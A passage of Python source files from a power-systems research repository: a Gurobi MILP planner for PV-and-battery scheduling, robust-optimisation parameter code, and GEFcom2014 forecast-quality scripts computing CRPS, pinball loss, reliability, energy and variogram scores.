# power balance equation
model.addConstrs((y_prod[i] - y_PV[i] - (y_discharge[i] - y_charge[i]) == 0 for i in self.t_set), name='c_power_balance_eq')
# min production
model.addConstrs((y_prod[i] >= self.min_production[i] for i in self.t_set), name='c_min_y_prod')
# max production
model.addConstrs((y_prod[i] <= self.max_production[i] for i in self.t_set), name='c_max_y_prod')
if self.overproduction:
# forbid overproduction
model.addConstrs((y_prod[i] <= (x[i] + self.deadband_penalty) for i in self.t_set), name='c_over_prod')
# BESS dynamics first period
model.addConstr((y_s[0] - self.period_hours * (self.charge_eff * y_charge[0] - y_discharge[0] / self.discharge_eff) == self.soc_ini), name='c_BESS_first_period')
# BESS dynamics from second to last periods
model.addConstrs((y_s[i] - y_s[i-1]- self.period_hours * (self.charge_eff * y_charge[i] - y_discharge[i] / self.discharge_eff) == 0 for i in range(1, self.nb_periods)), name='c_BESS_dynamics')
# BESS dynamics last period
model.addConstr((y_s[self.nb_periods-1] == self.soc_end ), name='c_BESS_last_period')
# Short penalty cst
model.addConstrs((y_short_dev[i] >= (x[i] - self.deadband_penalty) - y_prod[i] for i in self.t_set), name='c_short_penalty')
# Long penalty cst
model.addConstrs((y_long_dev[i] >= y_prod[i] - (x[i] + self.deadband_penalty) for i in self.t_set), name='c_long_penalty')
# PV generation cst
model.addConstrs((y_PV[i] <= self.pv_forecast[i] for i in self.t_set), name='c_PV_generation')
# -------------------------------------------------------------------------------------------------------------
# 5. Store variables
self.allvar = dict()
self.allvar['x'] = x
self.allvar['y_prod'] = y_prod
self.allvar['y_short_dev'] = y_short_dev
self.allvar['y_long_dev'] = y_long_dev
self.allvar['y_s'] = y_s
self.allvar['y_charge'] = y_charge
self.allvar['y_discharge'] = y_discharge
self.allvar['y_PV'] = y_PV
self.allvar['y_b'] = y_b
self.time_building_model = time.time() - t_build
# print("Time spent building the mathematical program: %gs" % self.time_building_model)
return model
def solve(self, LogToConsole:bool=False, logfile:str="", Threads:int=0, MIPFocus:int=0, TimeLimit:float=GRB.INFINITY):
t_solve = time.time()
self.model.setParam('LogToConsole', LogToConsole) # no log in the console if set to False
# self.model.setParam('OutputFlag', outputflag) # no log into console and log file if set to True
# self.model.setParam('MIPGap', 0.01)
self.model.setParam('TimeLimit', TimeLimit)
self.model.setParam('MIPFocus', MIPFocus)
# self.model.setParam('DualReductions', 0) # Model was proven to be either infeasible or unbounded. To obtain a more definitive conclusion, set the DualReductions parameter to 0 and reoptimize.
# If you are more interested in good quality feasible solutions, you can select MIPFocus=1.
# If you believe the solver is having no trouble finding the optimal solution, and wish to focus more attention on proving optimality, select MIPFocus=2.
# If the best objective bound is moving very slowly (or not at all), you may want to try MIPFocus=3 to focus on the bound.
self.model.setParam('LogFile', logfile) # no log in file if set to ""
self.model.setParam('Threads', Threads) # Default value = 0 -> use all threads
self.model.optimize()
self.solver_status = self.model.status
self.time_solving_model = time.time() - t_solve
def store_solution(self):
m = self.model
solution = dict()
solution['status'] = m.status
if solution['status'] == 2 or solution['status'] == 9:
solution['obj'] = m.objVal
# 1 dimensional variables
for var in ['x', 'y_prod', 'y_short_dev', 'y_long_dev', 'y_s', 'y_charge', 'y_discharge', 'y_PV', 'y_b']:
solution[var] = [self.allvar[var][t].X for t in self.t_set]
else:
print('WARNING planner MILP status %s -> problem not solved, objective is set to nan' %(solution['status']))
solution['obj'] = math.nan
# 3. Timing indicators
solution["time_building"] = self.time_building_model
solution["time_solving"] = self.time_solving_model
solution["time_total"] = self.time_building_model + self.time_solving_model
return solution
def export_model(self, filename):
"""
Export the pyomo model into a cpxlp format.
:param filename: directory and filename of the exported model.
"""
self.model.write("%s.lp" % filename)
# self.model.write("%s.mps" % filename)
# Validation set
VS = 'VS1' # 'VS1', 'VS2'
if __name__ == "__main__":
# Set the working directory to the root of the project
print(os.getcwd())
os.chdir(ROOT_DIR)
print(os.getcwd())
dirname = 'ro/determinist/export/'
# load data
pv_solution = build_observations()
pv_dad = build_point_forecast()
# Select a particular day of the dataset
day = '2020-05-26'
pv_solution_day = pv_solution.loc[day].values
pv_forecast_day = pv_dad.loc[day].values
# Plot point forecasts vs observations
FONTSIZE = 20
plt.figure()
plt.plot(pv_solution_day, label='observations')
plt.plot(pv_forecast_day, label='forecast')
plt.ylabel('kW', fontsize=FONTSIZE, rotation='horizontal')
plt.xticks(fontsize=FONTSIZE)
plt.yticks(fontsize=FONTSIZE)
plt.legend(fontsize=FONTSIZE)
plt.tight_layout()
plt.show()
# MILP planner with perfect forecasts -> oracle
planner_oracle = Planner_MILP(pv_forecast=pv_solution_day)
planner_oracle.export_model(dirname + 'planner_MILP')
planner_oracle.solve()
solution_oracle = planner_oracle.store_solution()
print('objective oracle %.2f' % (solution_oracle['obj']))
# MILP planner with point forecasts
planner = Planner_MILP(pv_forecast=pv_forecast_day)
planner.solve()
solution = planner.store_solution()
# dump_file(dir=dirname, name='solution_point_forecasts', file=solution['x'])
print('objective point forecasts %.2f' % (solution['obj']))
plt.figure()
plt.plot(solution_oracle['x'], label='x oracle')
plt.plot(solution['x'], label='x LSTM point')
# plt.plot(pv_solution_day, label= 'Pm')
# plt.plot(pv_forecast_day, label= 'Pp')
plt.ylabel('kW', fontsize=FONTSIZE, rotation='horizontal')
plt.xticks(fontsize=FONTSIZE)
plt.yticks(fontsize=FONTSIZE)
plt.legend(fontsize=FONTSIZE)
plt.ylim(-0.05 * PARAMETERS['pv_capacity'], PARAMETERS['pv_capacity'])
plt.title('MILP formulation')
plt.legend(fontsize=FONTSIZE)
# plt.savefig(dirname+ 'MILP_oracle_vs_point.pdf')
plt.show()
```
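A quick way to sanity-check the short/long deviation constraints above (`c_short_penalty` and `c_long_penalty`) is to note that, at the optimum, `y_short_dev` and `y_long_dev` are the positive parts of the under- and over-production with respect to the deadband around the engagement `x`. The sketch below recomputes these deviations in plain NumPy from a given plan; the variable names mirror the MILP, but the helper itself is illustrative and not part of the repository.
```python
import numpy as np

def imbalance_deviations(x, y_prod, deadband):
    """Positive parts of the short/long deviations used in the MILP penalties.

    x: engagement plan (kW), y_prod: net production (kW),
    deadband: tolerance around x (kW). Illustrative helper, not repository code.
    """
    x = np.asarray(x, dtype=float)
    y_prod = np.asarray(y_prod, dtype=float)
    short_dev = np.maximum(0.0, (x - deadband) - y_prod)  # production below the deadband
    long_dev = np.maximum(0.0, y_prod - (x + deadband))   # production above the deadband
    return short_dev, long_dev

# Example: a 4-period plan with a 50 kW deadband
short, long_ = imbalance_deviations(x=[100, 200, 300, 400],
                                    y_prod=[30, 260, 300, 380],
                                    deadband=50)
print(short)  # [20.  0.  0.  0.]
print(long_)  # [ 0. 10.  0.  0.]
```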
#### File: robust/algorithms/ro_params.py
```python
import os
import random
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from ro.utils import build_observations, build_point_forecast, build_point_intra_forecast, load_lstm_quantiles
from root_project import ROOT_DIR
from ro.ro_simulator_configuration import PARAMETERS
def compute_ro_dyn_params(pv_quantile: np.array, d_gamma_threshold: float, d_pvmin: float):
"""
Compute the max depth and Gamma parameters for dynamic Robust Optimization given the parameters d_gamma_threshold and d_pvmin.
:param pv_quantile:
:param d_gamma_threshold:
:param d_pvmin:
:return: max depth and gamma.
"""
df = pd.DataFrame()
df['50-10'] = pv_quantile[:, 4] - pv_quantile[:, 0]
df['50-20'] = pv_quantile[:, 4] - pv_quantile[:, 1]
df['50-30'] = pv_quantile[:, 4] - pv_quantile[:, 2]
df['50-40'] = pv_quantile[:, 4] - pv_quantile[:, 3]
# Time periods where q 50 = 0
q50_0_indx = np.argwhere((pv_quantile[:, 4] > 0).astype(np.int) == 0)[:, 0]
# Count time periods where d 50-10 > gamma_threshold
tab_gamma = (df['50-10'].values > d_gamma_threshold).astype(np.int)
gamma = sum(tab_gamma)
# Count time periods where d 50-20, d 50-30, d50-40 > depth_threshold
tab_50_40 = (df['50-40'].values > d_pvmin * df['50-10'].values).astype(np.int)
tab_50_30 = (df['50-30'].values > d_pvmin * df['50-10'].values).astype(np.int)
tab_50_20 = (df['50-20'].values > d_pvmin * df['50-10'].values).astype(np.int)
tab_depth = tab_50_40 + tab_50_30 + tab_50_20
for i in q50_0_indx:
tab_depth[i] = 0
tab_gamma[i] = 0
# FONTSIZE = 10
# x_index = [i for i in range(0, 96)]
# plt.figure()
# plt.plot(x_index, tab_depth, label='depth')
# plt.plot(x_index, tab_gamma, label=r'$\Gamma=$'+str(gamma))
# plt.ylim(0, 4)
# plt.xticks(fontsize=FONTSIZE)
# plt.yticks(fontsize=FONTSIZE)
# plt.title(day)
# plt.tight_layout()
# plt.legend(fontsize=FONTSIZE)
# plt.show()
# Build the worst PV trajectory
worst_pv = pv_quantile[:, 3].copy() # quantile 40%
for k in range(0, 95 + 1):
if tab_depth[k] == 1:
worst_pv[k] = pv_quantile[k, 2] # quantile 30%
elif tab_depth[k] == 2:
worst_pv[k] = pv_quantile[k, 1] # quantile 20%
elif tab_depth[k] == 3:
worst_pv[k] = pv_quantile[k, 0] # quantile 10%
return worst_pv, gamma
nb_periods = 96
N_Q = 9
q_set = [0, 1, 2, 3, 4, 5, 6, 7, 8] # -> 10%, 20%, .., 90%
config = ['oracle', 'point'] + q_set # ['oracle', 'point'] + q_set
# Validation set
nb_days = 30 # 30, 334 = total number of days of the dataset
VS = str(nb_days) #
if __name__ == "__main__":
# Set the working directory to the root of the project
print(os.getcwd())
os.chdir(ROOT_DIR)
print(os.getcwd())
print('-----------------------------------------------------------------------------------------------------------')
# load data
pv_solution = build_observations()
pv_dad = build_point_forecast()
pv_intra = build_point_intra_forecast()
# Load quantile forecasts: from 0 to 8 -> median = quantile 4
pv_quantile = load_lstm_quantiles()
day_list = [day.strftime('%Y-%m-%d') for day in pv_intra.index]
random.seed(1)
if nb_days == len(day_list):
day_list_sampled = day_list
else:
day_list_sampled = random.sample(day_list, nb_days)
# -----------------------------------------------------------------------------------------------------------
# RESULTS
# -----------------------------------------------------------------------------------------------------------
gamma_threshold = 0.1 * PARAMETERS["pv_capacity"]
depth_threshold = 0.3
for day in day_list_sampled[:10]:
pv_solution_day = pv_solution.loc[day].values
pv_point_day = pv_dad.loc[day].values
pv_quantile_day = pv_quantile.loc[day].values.reshape(nb_periods, N_Q)
FONTSIZE = 10
x_index = [i for i in range(0, nb_periods)]
plt.figure()
for j in range(1, N_Q // 2+1):
plt.fill_between(x_index, pv_quantile_day[:,j + N_Q // 2], pv_quantile_day[:,(N_Q // 2) - j], alpha=0.5 / j, color=(1 / j, 0, 1))
plt.plot(x_index, pv_quantile_day[:,4], 'b', linewidth=3, label='50 %')
plt.plot(x_index, pv_solution_day, 'r', linewidth=3, label='obs')
plt.plot(x_index, pv_point_day, 'k--', linewidth=3, label='point')
plt.ylim(0, PARAMETERS["pv_capacity"])
plt.ylabel('kW', fontsize=FONTSIZE, rotation='horizontal')
plt.xticks(fontsize=FONTSIZE)
plt.yticks(fontsize=FONTSIZE)
plt.legend(fontsize=FONTSIZE)
plt.title(day)
plt.tight_layout()
plt.show()
# plt.figure()
# for j in range(0, 3+1):
# plt.plot(pv_quantile_day[:, 4] - pv_quantile_day[:, j], label='50 % - ' + str(10+10*j) + ' %')
# plt.plot(depth_threshold * (pv_quantile_day[:, 4] - pv_quantile_day[:, 0]), 'k',label='depth threshold')
# plt.hlines(y=gamma_threshold, xmin=0, xmax=95, colors='r', label='gamma threshold')
# plt.ylim(0, 0.5 * PARAMETERS["pv_capacity"])
# plt.ylabel('kW', fontsize=FONTSIZE, rotation='horizontal')
# plt.xticks(fontsize=FONTSIZE)
# plt.yticks(fontsize=FONTSIZE)
# plt.legend(fontsize=FONTSIZE)
# plt.title(day)
# plt.tight_layout()
# plt.show()
worst_pv, gamma = compute_ro_dyn_params(pv_quantile=pv_quantile_day, d_gamma_threshold=gamma_threshold, d_pvmin=depth_threshold)
plt.figure()
for j in range(1, 5+1):
plt.plot(x_index, pv_quantile_day[:,5-j], alpha=1 / j, color=(1 / j, 0, 1), linewidth=3, label=str(10*(5-j+1)) + '%')
plt.plot(x_index, worst_pv, 'g',linewidth=3, label='worst PV with '+r'$\Gamma=$'+str(gamma))
plt.plot(x_index, pv_solution_day, 'r:', linewidth=3, label='obs')
plt.plot(x_index, pv_point_day, 'k--', linewidth=3, label='point')
plt.ylim(0, PARAMETERS["pv_capacity"])
plt.ylabel('kW', fontsize=FONTSIZE, rotation='horizontal')
plt.xticks(fontsize=FONTSIZE)
plt.yticks(fontsize=FONTSIZE)
plt.legend(fontsize=FONTSIZE)
plt.title(day)
plt.tight_layout()
plt.show()
``` |
{
"source": "jonathandumas/generative-models-power-systems",
"score": 2
} |
#### File: GEFcom2014/forecast_quality/CRPS_QS_all_tracks.py
```python
import os
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import mean_absolute_error
from GEFcom2014 import pv_data, wind_data, load_data, read_file
from GEFcom2014.forecast_quality.utils_quality import plf_per_quantile, compute_reliability, crps_per_period
if __name__ == "__main__":
"""
Quality scenario evaluation for all tracks (CRPS, QS, and reliability diagrams)
"""
dir_path = 'export/all_tracks/'
if not os.path.isdir(dir_path): # test if directory exist
os.makedirs(dir_path)
# ------------------------------------------------------------------------------------------------------------------
# GEFcom IJF_paper case study
# Solar track: 3 zones
# Wind track: 10 zones
# Load track: 1 zones
# 50 days picked randomly per zone for the VS and TEST sets
# ------------------------------------------------------------------------------------------------------------------
model_labels = ['NF', 'VAE', 'GAN']
colors = ['tab:blue', 'tab:orange', 'tab:green']
nb_scenarios = 100
N_q = 99
CRPS = True
plf_all_models = dict()
crps_all_models = dict()
aq_all_models = dict()
mae_r_all_models = dict()
nf_a_id = {'pv': 10,
'wind': 8,
'load': 1}
nf_umnn_id = {'pv': 3,
'wind': 1,
'load': 1}
for tag in ['wind', 'pv', 'load']:
# tag = 'wind' # pv, wind, load
if tag == 'pv':
# WARNING: the time periods where PV is always 0 (night hours) are removed -> there are 8 periods removed
# The index of the time periods removed are provided into indices
data, indices = pv_data(path_name='../data/solar_new.csv', test_size=50, random_state=0)
nb_zones = 3
elif tag == 'wind':
data = wind_data(path_name='../data/wind_data_all_zone.csv', test_size=50, random_state=0)
nb_zones = 10
indices = []
elif tag == 'load':
data = load_data(path_name='../data/load_data_track1.csv', test_size=50, random_state=0)
nb_zones = 1
indices = []
df_x_LS = data[0].copy()
df_y_LS = data[1].copy()
df_x_VS = data[2].copy()
df_y_VS = data[3].copy()
df_x_TEST = data[4].copy()
df_y_TEST = data[5].copy()
nb_days_LS = int(len(df_y_LS) /nb_zones)
nb_days_VS = int(len(df_y_VS) /nb_zones )
nb_days_TEST = int(len(df_y_TEST) /nb_zones)
print('#LS %s days #VS %s days # TEST %s days' % (nb_days_LS, nb_days_VS, nb_days_TEST))
# ------------------------------------------------------------------------------------------------------------------
# Rebuild the PV observations with the removed time periods
# ------------------------------------------------------------------------------------------------------------------
non_null_indexes = list(np.delete(np.asarray([i for i in range(24)]), indices))
if tag == 'pv':
# Rebuild the PV observations with the removed time periods
df_y_TEST.columns = non_null_indexes
for i in indices:
df_y_TEST[i] = 0
df_y_TEST = df_y_TEST.sort_index(axis=1)
# --------------------------------------------------------------------------------------------------------------
# Quality metrics
# --------------------------------------------------------------------------------------------------------------
y_true = df_y_TEST.values.reshape(-1) # reshape from (#TEST, 24) to (24 * #TEST,)
# --------------------------------------------------------------------------------------------------------------
# 0. Load scenarios on the TS for 'NF-UMNN', 'NF-A', 'VAE', 'GAN', and 'RAND'
# --------------------------------------------------------------------------------------------------------------
# scenarios shape = (24*n_days, n_s)
s_umnn = read_file(dir='scenarios/nfs/', name='scenarios_' + tag + '_UMNN_M_' + str(nf_umnn_id[tag]) + '_0_100_TEST')
# s_an = read_file(dir='scenarios/nfs/', name='scenarios_' + tag + '_AN_M_'+str(nf_a_id[tag])+'_0_100_TEST')
s_vae = read_file(dir='scenarios/vae/', name='scenarios_' + tag + '_VAElinear_1_0_100_TEST')
s_gan = read_file(dir='scenarios/gan/', name='scenarios_' + tag + '_GAN_wasserstein_1_0_100_TEST')
# s_gc = read_file(dir='scenarios/gc/', name='scenarios_' + tag + '_gc_100_TEST')
s_rand = read_file(dir='scenarios/random/', name='scenarios_' + tag + '_random_100_TEST')
scenarios_list = [s_umnn, s_vae, s_gan, s_rand]
# PLot scenarios
n_days = 1
FONTSIZE = 15
x_index = [i for i in range(1, n_days*24 + 1)]
plt.figure()
plt.plot(x_index, s_umnn[:n_days*24,:10], color='gray', linewidth=3, alpha=0.5)
plt.ylim(0, 1)
plt.tick_params(axis='both', labelsize=FONTSIZE)
plt.tight_layout()
plt.savefig(dir_path + tag + '_scenarios.pdf')
plt.show()
plt.figure()
plt.plot(x_index, y_true[:n_days*24], color='red', linewidth=3)
plt.ylim(0, 1)
plt.tick_params(axis='both', labelsize=FONTSIZE)
plt.tight_layout()
plt.savefig(dir_path + tag + '_true.pdf')
plt.show()
# --------------------------------------------------------------------------------------------------------------
# 1. Generate quantiles from scenarios
# --------------------------------------------------------------------------------------------------------------
q_set = [i / (N_q + 1) for i in range(1, N_q + 1)]
# Quantiles are generated into an array of shape (n_day*24, N_q), the same shape than scenarios
quantiles_list = []
for s in scenarios_list:
quantiles_list.append(np.quantile(s, q=q_set, axis=1).transpose())
# --------------------------------------------------------------------------------------------------------------
# 2. PLF TEST & VS
# --------------------------------------------------------------------------------------------------------------
plf_list = []
for q in quantiles_list:
plf_list.append(plf_per_quantile(quantiles=q, y_true=y_true))
print('%s PLF TS UMNN %.2f VAE %.2f GAN %.2f RAND %.2f' % (tag, plf_list[0].mean(), plf_list[1].mean(), plf_list[2].mean(), plf_list[3].mean()))
print('')
plf_all_models[tag] = plf_list[:-1]
# --------------------------------------------------------------------------------------------------------------
# 3. Reliability diagram
# --------------------------------------------------------------------------------------------------------------
aq_list = []
for q in quantiles_list:
aq_list.append(compute_reliability(y_true=y_true, y_quantile=q, tag=tag))
aq_all_models[tag] = aq_list[:-1]
mae_list = []
for a in aq_list:
mae_list.append(mean_absolute_error(y_true=np.array(q_set) * 100, y_pred=a))
print('%s MAE TS UMNN %.2f VAE %.2f GAN %.2f RAND %.2f' % (tag, mae_list[0], mae_list[1], mae_list[2], mae_list[3]))
print('')
mae_r_all_models[tag] = mae_list[:-1]
# --------------------------------------------------------------------------------------------------------------
# CRPS
# --------------------------------------------------------------------------------------------------------------
if CRPS:
max_s = 100
crps_list = []
for s in scenarios_list:
crps, crps_d = crps_per_period(scenarios=s, y_true=y_true, max_s=max_s)
crps_list.append(crps)
print('%s CRPS TEST UMNN %.2f VAE %.2f GAN %.2f RAND %.2f' % (tag, 100 * crps_list[0].mean(), 100 * crps_list[1].mean(), 100 * crps_list[2].mean(), 100 * crps_list[3].mean()))
print('')
crps_all_models[tag] = crps_list[:-1]
# --------------------------------------------------------------------------------------------------------------
# PLOTS
# --------------------------------------------------------------------------------------------------------------
"""
Plot the quantile score (PLF = Pinball Loss Function) per quantile on the TEST set of multiple generative models for all tracks.
:param plf: list of the plf_score of multiple generative models. Each element of the list is an array.
"""
x_index = [q for q in range(1, N_q + 1)]
FONTSIZE = 15
plt.figure(figsize=(5, 4))
for l, c in zip(plf_all_models['wind'], colors):
plt.plot(x_index, l, color=c, marker='P', linewidth=2)
for l, c in zip(plf_all_models['load'], colors):
plt.plot(x_index, l, color=c, linestyle="dashed", linewidth=2)
for l, c, lab in zip(plf_all_models['pv'], colors, model_labels):
plt.plot(x_index, l, color=c, label=lab, linewidth=2)
plt.plot(x_index, [-20] * len(x_index), color='k', marker='P', label='wind')
plt.plot(x_index, [-20] * len(x_index), color='k', label='PV')
plt.plot(x_index, [-20] * len(x_index), color='k', linestyle="dashed", label='load')
plt.vlines(x=(N_q + 1) / 2, colors='k', ymin=0, ymax=7)
plt.ylim(0, 7)
plt.xlim(0, N_q + 1)
plt.tick_params(axis='both', labelsize=FONTSIZE)
plt.xticks(ticks=[0, 20, 40, 60, 80, 100])
plt.yticks(ticks=[0, 2, 4, 6])
plt.xlabel('$q$', fontsize=FONTSIZE)
plt.ylabel('%', fontsize=FONTSIZE)
legend = plt.legend(fontsize=1.5*FONTSIZE, ncol=2)
legend.remove()
plt.grid(True)
plt.tight_layout()
plt.savefig(dir_path + 'plf.pdf')
plt.show()
"""
Plot the CRPS on the TEST set of multiple generative models for all tracks.
:param crps: list of the crps scores of multiple generative models. Each element of the list is an array.
"""
if CRPS:
FONTSIZE = 15
plt.figure(figsize=(5, 4))
for l, c in zip(crps_all_models['wind'], colors):
plt.plot(100* l, color=c, marker='P', linewidth=2)
for l, c in zip(crps_all_models['load'], colors):
plt.plot(100* l, color=c, linestyle="dashed", linewidth=2)
for l, c, lab in zip(crps_all_models['pv'], colors, model_labels):
plt.plot(100* l, color=c, label=lab, linewidth=2)
plt.tick_params(axis='both', labelsize=FONTSIZE)
plt.xlabel('Hour', fontsize=FONTSIZE)
plt.ylabel('%', fontsize=FONTSIZE)
plt.xticks([0, 6, 12, 18, 23], ['1', '6', '12', '18', '24'])
plt.yticks(ticks=[0, 2, 4, 6, 8, 10])
legend = plt.legend(fontsize=1.5 * FONTSIZE, ncol=2)
legend.remove()
plt.grid(True)
plt.ylim(0, 12)
plt.xlim(0, 23)
plt.tight_layout()
plt.savefig(dir_path + 'crps.pdf')
plt.show()
"""
Plot the Reliablity diagram per quantile on the TEST set of multiple generative models for all tracks.
:param aq: list of the aq scores of multiple generative models. Each element of the list is an array of shape (n_q,).
"""
FONTSIZE = 15
plt.figure(figsize=(5, 4))
plt.plot(x_index, x_index, 'k', linewidth=2)
for l, c in zip(aq_all_models['wind'], colors):
plt.plot(x_index, l, color=c, marker='P')
for l, c in zip(aq_all_models['load'], colors):
plt.plot(x_index, l, color=c, linestyle="dashed")
for l, c, lab in zip(aq_all_models['pv'], colors, model_labels):
plt.plot(x_index, l, color=c, label=lab)
plt.xlim(0, 100)
plt.ylim(0, 100)
plt.xlabel('$q$', fontsize=FONTSIZE)
plt.tick_params(axis='both', labelsize=FONTSIZE)
# plt.xticks(ticks=[i for i in range(0, 100 + 10, 10)])
# plt.yticks(ticks=[i for i in range(0, 100 + 10, 10)])
plt.xticks(ticks=[0, 20, 40, 60, 80, 100])
plt.yticks(ticks=[0, 20, 40, 60, 80, 100])
plt.ylabel('%', fontsize=FONTSIZE)
legend = plt.legend(fontsize=1.5*FONTSIZE, ncol=2)
legend.remove()
plt.grid(True)
plt.tight_layout()
plt.savefig(dir_path + 'reliability.pdf')
plt.show()
"""
Export only the legend
"""
def export_legend(legend, filename="legend.pdf"):
fig = legend.figure
fig.canvas.draw()
bbox = legend.get_window_extent().transformed(fig.dpi_scale_trans.inverted())
fig.savefig(dir_path + filename, dpi="figure", bbox_inches=bbox)
x_index = [q for q in range(1, N_q + 1)]
FONTSIZE = 15
fig, ax = plt.subplots(1, figsize=(20,20))
plt.plot(x_index, [-20] * len(x_index), color='tab:blue', label='NF', linewidth=2)
plt.plot(x_index, [-20] * len(x_index), color='k', marker='P', label='wind')
plt.plot(x_index, [-20] * len(x_index), color='tab:orange', label='VAE', linewidth=2)
plt.plot(x_index, [-20] * len(x_index), color='k', label='PV')
plt.plot(x_index, [-20] * len(x_index), color='tab:green', label='GAN', linewidth=2)
plt.plot(x_index, [-20] * len(x_index), color='k', linestyle="dashed", label='load')
plt.yticks(ticks=[-20] * len(x_index), labels=" ")
plt.xticks(ticks=x_index, labels=" ")
ax.get_yaxis().set_visible(False)
ax.get_xaxis().set_visible(False)
plt.tick_params(axis='both', labelsize=FONTSIZE)
legend = plt.legend(fontsize=1.5*FONTSIZE, ncol=3)
export_legend(legend)
plt.tight_layout()
plt.show()
x_index = [i for i in range(1, 24+1)]
FONTSIZE = 15
fig, ax = plt.subplots(1, figsize=(20,20))
plt.plot(x_index, [-20] * len(x_index), color='gray', label='scenarios')
plt.plot(x_index, [-20] * len(x_index), color='b', label='10 %')
plt.plot(x_index, [-20] * len(x_index), color='k', label='50 %')
plt.plot(x_index, [-20] * len(x_index), color='g', label='90 %')
plt.plot(x_index, [-20] * len(x_index), color='r', label='obs')
plt.yticks(ticks=[-20] * len(x_index), labels=" ")
plt.xticks(ticks=x_index, labels=" ")
ax.get_yaxis().set_visible(False)
ax.get_xaxis().set_visible(False)
legend = plt.legend(fontsize=1.5*FONTSIZE, ncol=5)
export_legend(legend, filename='legend_scenarios.pdf')
plt.tight_layout()
plt.show()
```
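The script above relies on `plf_per_quantile` from `utils_quality`, whose implementation is not shown in this excerpt. For reference, a minimal pinball (quantile) loss computed per quantile could look like the sketch below; it assumes quantile forecasts of shape (n, n_q) built for levels q = 1/(n_q+1), ..., n_q/(n_q+1), as in the script, and reports the loss in percent like the PLF values printed above. It is a sketch of the standard formula, not necessarily the repository's exact implementation.
```python
import numpy as np

def pinball_loss_per_quantile(quantiles: np.ndarray, y_true: np.ndarray) -> np.ndarray:
    """Average pinball loss per quantile level, in %.

    quantiles: array of shape (n, n_q), column j holding the forecast of level q_j.
    y_true: observations of shape (n,).
    Illustrative sketch, not necessarily identical to plf_per_quantile.
    """
    n, n_q = quantiles.shape
    q_levels = np.array([j / (n_q + 1) for j in range(1, n_q + 1)])
    diff = y_true[:, None] - quantiles  # positive when the forecast undershoots
    loss = np.where(diff >= 0, q_levels * diff, (q_levels - 1) * diff)
    return 100 * loss.mean(axis=0)  # shape (n_q,)

# toy usage
rng = np.random.default_rng(0)
obs = rng.uniform(size=200)
qs = np.quantile(rng.uniform(size=(200, 100)), q=[i / 100 for i in range(1, 100)], axis=1).T
print(pinball_loss_per_quantile(qs, obs).shape)  # (99,)
```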
#### File: GEFcom2014/forecast_quality/ES_VS_metrics.py
```python
import math
import os
import pickle
import random
import seaborn as sns
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from GEFcom2014 import read_file
from GEFcom2014 import pv_data, wind_data, load_data, read_file
from GEFcom2014.forecast_quality import compute_DM
def energy_score(s: np.array, y_true: np.array):
"""
Compute the Energy score (ES).
:param s: scenarios of shape (24*n_days, n_s)
:param y_true: observations of shape = (n_days, 24)
:return: the ES per day of the testing set.
"""
n_periods = y_true.shape[1]
n_d = len(y_true) # number of days
n_s = s.shape[1] # number of scenarios per day
es = []
# loop on all days
for d in range(n_d):
# select a day for both the scenarios and observations
s_d = s[n_periods * d:n_periods * (d + 1), :]
y_d = y_true[d, :]
# compute the first part of the ES
simple_sum = np.mean([np.linalg.norm(s_d[:, s] - y_d) for s in range(n_s)])
# compute the second part of the ES
double_somme = 0
for i in range(n_s):
for j in range(n_s):
double_somme += np.linalg.norm(s_d[:, i] - s_d[:, j])
double_sum = double_somme / (2 * n_s * n_s)
# ES per day
es_d = simple_sum - double_sum
es.append(es_d)
return es
def variogram_score(s: np.array, y_true: np.array, beta: float):
"""
Compute the Variogram score (VS).
:param s: scenarios of shape (24*n_days, n_s)
:param y_true: observations of shape = (n_days, 24)
:param beta: order of the VS
:return: the VS per day of the testing set.
"""
n_periods = y_true.shape[1]
n_d = len(y_true) # number of days
n_s = s.shape[1] # number of scenarios per day
weights = 1 # equal weights across all hours of the day
vs = []
# loop on all days
for d in range(n_d):
# select a day for both the scenarios and observations
s_d = s[n_periods * d:n_periods * (d + 1), :]
y_d = y_true[d, :]
# Double loop on time periods of the day
vs_d = 0
for k1 in range(n_periods):
for k2 in range(n_periods):
# VS first part
first_part = np.abs(y_d[k1] - y_d[k2]) ** beta
second_part = 0
# Loop on all scenarios to compute VS second part
for i in range(n_s):
second_part += np.abs(s_d[k1, i] - s_d[k2, i]) ** beta
second_part = second_part / n_s
vs_d += weights * (first_part - second_part) ** 2
# VS per day
vs.append(vs_d)
return vs
def plot_DM(p_value: np.array, dir: str, pdf_name: str):
"""
Plot the DM test.
"""
FONTSIZE = 20
plt.figure()
sns.set(font_scale=1.5)
sns_plot = sns.heatmap(100 * p_value, cmap='RdYlGn_r', fmt=".1f", linewidths=0.5, xticklabels=True,
yticklabels=True, annot=False, vmin=0, vmax=10, annot_kws={"size": FONTSIZE})
sns_plot.set_xticklabels(labels=models, rotation='horizontal', fontsize=FONTSIZE)
sns_plot.set_yticklabels(labels=models, rotation=90, fontsize=FONTSIZE)
sns_plot.figure.axes[-1].yaxis.label.set_size(FONTSIZE)
plt.tight_layout()
plt.savefig(dir + pdf_name + '.pdf')
plt.show()
if __name__ == '__main__':
"""
Energy and Variogram scores.
"""
beta = 0.5 # VS order
dir_path = 'export/multivariate_metrics/'
if not os.path.isdir(dir_path): # test if directory exist
os.makedirs(dir_path)
nf_a_id = {'pv': 10,
'wind': 8,
'load': 1}
nf_umnn_id = {'pv': 3,
'wind': 1,
'load': 1}
# ------------------------------------------------------------------------------------------------------------------
# GEFcom IJF_paper case study
# Solar track: 3 zones
# Wind track: 10 zones
# Load track: 1 zones
# 50 days picked randomly per zone for the VS and TEST sets
# ------------------------------------------------------------------------------------------------------------------
es_res = []
vs_res = []
for tag in ['wind', 'pv', 'load']:
if tag == 'pv':
# WARNING: the time periods where PV is always 0 (night hours) are removed -> there are 8 periods removed
# The index of the time periods removed are provided into indices
data, indices = pv_data(path_name='../data/solar_new.csv', test_size=50, random_state=0)
nb_zones = 3
elif tag == 'wind':
data = wind_data(path_name='../data/wind_data_all_zone.csv', test_size=50, random_state=0)
nb_zones = 10
indices = []
elif tag == 'load':
data = load_data(path_name='../data/load_data_track1.csv', test_size=50, random_state=0)
nb_zones = 1
indices = []
df_x_LS = data[0].copy()
df_y_LS = data[1].copy()
df_x_VS = data[2].copy()
df_y_VS = data[3].copy()
df_x_TEST = data[4].copy()
df_y_TEST = data[5].copy()
nb_days_LS = int(len(df_y_LS) /nb_zones)
nb_days_VS = int(len(df_y_VS) /nb_zones )
nb_days_TEST = int(len(df_y_TEST) /nb_zones)
